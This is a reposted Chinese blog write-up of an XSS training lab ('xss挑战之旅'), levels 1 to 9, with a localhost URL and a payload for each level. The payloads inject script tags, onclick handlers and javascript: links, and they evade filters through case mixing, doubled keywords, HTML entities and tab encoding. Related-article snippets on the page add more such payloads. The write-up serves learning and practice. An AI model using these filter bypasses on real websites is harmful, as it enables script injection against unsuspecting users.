xss挑战之旅wp

最新推荐文章于 2024-07-12 09:36:48 发布
最新推荐文章于 2024-07-12 09:36:48 发布
阅读量214 收藏 1
点赞数
文章标签: javascript php ViewUI
原文链接:http://www.cnblogs.com/mxwx2018/p/9568339.html
版权

 

Level 1  -  180831

第一关很简单,开胃菜

payload: http://localhost/xss_game/level1.php?name=test123<script>alert(1)</script>

 

Level 2  -  180831

找到两个思路:

payload: test123"><script>alert(1)</script>#

第一个点被转义了,但是第二个点正常。

只要能实现标签和引号闭合就可以了。

第二种思路是借鉴别人wp,通过onclick点击事件弹窗。

payload: " οnclick="alert(1)     

 

Level 3  -  180901

这次使用的是单引号,和第二关思路相同

payload: ' οnclick='alert(1)

 

 

Level 4  -  180901

和第三关差不多

payload: " οnclick="alert(1)

 

Level 5  -  180901

<script>会被替换成<scr_ipt>,onclick被替换成o_nclick

payload: "><a href=javascript:alert(1)>

 点击如图即可执行javascript:alert(1):

 

 

Level 6  -  180901

这次过滤了href以及第5关的onclock、script

但是没有过滤大小写

payload: " oNclick="alert(1)

 

Level 7  -  180901

这次自动删除on关键字,使用重叠关键字写法:

payload: " oOnNclick="alert(1)

 

 

Level 8  -  180901

发现javascript会被转义,

payload: javascrip&#116;:alert(1) 

或者javascrip%09t:alert(1)

 

 

Level 9  -  180901

有两个点,都尝试一下:

 尝试payload: "οnclick=alert(1)

发现"被转义了

尝试使用第二个点进行xss测试:

使用tab的%09,或者 t 转义成&#116;

payload: javascrip%09t:alert(1)//http://123.com

或者: javascrip&#116;:alert(1)//http://123.com

 

 Level 10  -  180901

与第一关类似都是发送get请求,但是发现<>被转义了。

未完成。。。

 

转载于:https://www.cnblogs.com/mxwx2018/p/9568339.html

CERES123456
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss挑战赛-wp
Iambangbang的博客
08-20 956
prompt(1) to win problem 0   这道题没有别的特别之处,直接闭合标签然后构造就可以了,这里直接放payload ">prompt(1) 但是通过看大牛的wp这里也积累一些其他的思路, ">这个思路是利用了onload的免交互的特性 "onresize=prompt(1)>这个思路不常用,但是在IE10下,当页面第一次加载时,会调用resize事件,当把代
xss挑战(超详细小白)
weixin_64655821的博客
09-22 1326
xss挑战前十关
关于XSS
代码析构师的专栏
05-09 538
在网页过滤了 "> 绕过,上面write中内容输出的结果是alert(1)  遇到过滤无法调用js的时候也可以用类似的代码突破  "> 上面代码是跳转url到javascript:document.write("")  也就是调用js文件xxx  ">  "> 简要描述:和前面的不一样的时,有时候,输出会出现在HTML标签的属性之中。 例如: 、
js中onclick=“javascript:alert()“和onclick=“alert()“的区别
weixin_68548138的博客
01-28 1646
通常来说,使用 “onclick=‘alert()’” 更好,因为它是简洁而且易于理解。的区别是前者明确地指定了 JavaScript 作为脚本语言,而后者没有明确指定,因此在某些情况下可能会导致浏览器使用不同的脚本引擎执行脚本。
Xss挑战之旅writeup
cherrie007的博客
08-17 3500
Xss挑战之旅writeup
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如...
前端安全之XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
Web安全性测试之XSS
01-31
XSS 全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的...
xss-labs挑战(一) 1
08-08
XSS-labs 挑战(一)1 本文将详细介绍 XSS-labs 挑战(一)1 的知识点,包括挑战的安装、Level 1 无过滤机制、Level 2 闭合标签、Level 3 单引号闭合+htmlspecialchar()函数、Level 4 双引号闭合+添加事件、Level 5...
$("").click与onclick的区别示例介绍
06-28 683
Html代码 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 <script type="text/javascript"> $(function(){ $("#btn4").click(function(){ $("#
JavaScript
hongcaixia的博客
11-26 423
一、js的简介  1、js是什么 js是可以嵌入到html中,是 基于对象 和 事件驱动 的 脚本语言 特点: (1)交互性 (2)安全性:js不能访问本地磁盘 (3)跨平台:浏览器中都具备js解析器 2、js能做什么 (1)js能动态的修改(增删)html和css的代码 (2)能动态的校验数据 3、js历史及组成 ECMAScript BOM(浏览器对象模型)  D
自动关闭的弹出框(alert)
阿牛博客
08-16 8547
New Document     function autoCloseAlert(msg)   {      var tempFrm=document.getElementById("msgFrm");   if(tempFrm==null||typeof(tempFrm)=="undefined")   {     tempFrm =document.createElement("ifra
onclick事件没有反应的五种可能情况
qujing_1120的博客
08-07 4936
 onclick=”alert()” 事件没有反应的几种情况。 第一: 双引号包括双引号,将里面的双引号改为单引号。 第二: A没有赋值你或者 a的赋值写在了script里面,而没有写在head里面。这就是公共变量的问题。 第三 事件调用的是方法,是方法就应该加()小括号。忘了加小括号。 第四 方法名是name()。可能与某些关键词冲突,换一个名字或者加个123以
onclick事件没有反应的五种可能情况。
qq_33481269的博客
11-07 6万+
onclick=”alert()” 事件没有反应的几种情况。 第一: 双引号包括双引号,将里面的双引号改为单引号。 第二: A没有赋值你或者 a的赋值写在了script里面,而没有写在head里面。这就是公共变量的问题。 第三 事件调用的是方法,是方法就应该加()小括号。忘了加小括号。 第四 方法名是name()。可能与某些关键词冲突,换一个名字或者加个123以示区别就行
a标签添加onclick事件的几种方式
热门推荐
manman的分享
02-24 11万+
我们常用的在a标签中有点击事件:1. a href="javascript:js_method();"这种方法在传递this等参数的时候很容易出问题,而且javascript:协议作为a的href属性的时候不仅会导致不 必要的触发window.onbeforeunload事件,在IE里面更会使gif动画图片停止播放。W3C标准不推荐在href里面执行 javascript语句2. a href="...
Webkit简介以及工作流程
读心悦
07-10 310
WebKit是一个开源的浏览器引擎,最初由苹果公司基于KHTML(K Desktop Environment的HTML渲染引擎)开发,并广泛应用于Safari浏览器。随着时间的推移,WebKit也被其他多款浏览器和应用所采用,成为Web技术生态中的重要一员。WebKit的核心功能包括解析HTML、CSS、JavaScript等网页内容,并将其渲染为可视化的网页页面。它主要由WebCore(负责HTML解析、CSS样式计算和布局)和JavaScriptCore(负责JavaScript解释执行)两大部分组成。
vue引入sm-crypto通过sm4对文件进行加解密,用户输入密码
最新发布
cc1314_工作、学习有感
07-12 185
通过sm4对文件进行加解密,用户输入密码
vue2 、 vue3首屏优化,减少白屏时间
m0_56104994的博客
07-09 306
vue2、vue3首屏优化,减少白屏时间
前端 JS 经典:迭代器
weixin_64684095的博客
07-12 162
如果在最后一个值返回后再调用 next()方法,那么返回的对象中属性 done 的值为 true,属性 value 则包含迭代器最终返回的值(如果没有相关数据则返回 undefined)。可迭代对象具有 Symbol.iterator 属性,通过指定的函数可以返回一个作用于附属对象的迭代器。JavaScript 中有一些内置的可迭代对象,如数组、字符串、集合(Set)、映射(Map)等,它们都具有默认的迭代器。在 JavaScript 中,迭代器是一个对象,它定义了一个序列,并在终止时可能返回一个返回值。
一起打靶-Breach-2-final2.1.xss上线
09-28
在"一起打靶-Breach-2_final2.1.xss上线"这个挑战中,Breach-2.0 是一个实战型的Boot2Root/CTF(Capture The Flag)游戏,它的目标是通过一系列的真实世界场景和意想不到的转折来展示安全攻击和防御的过程。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值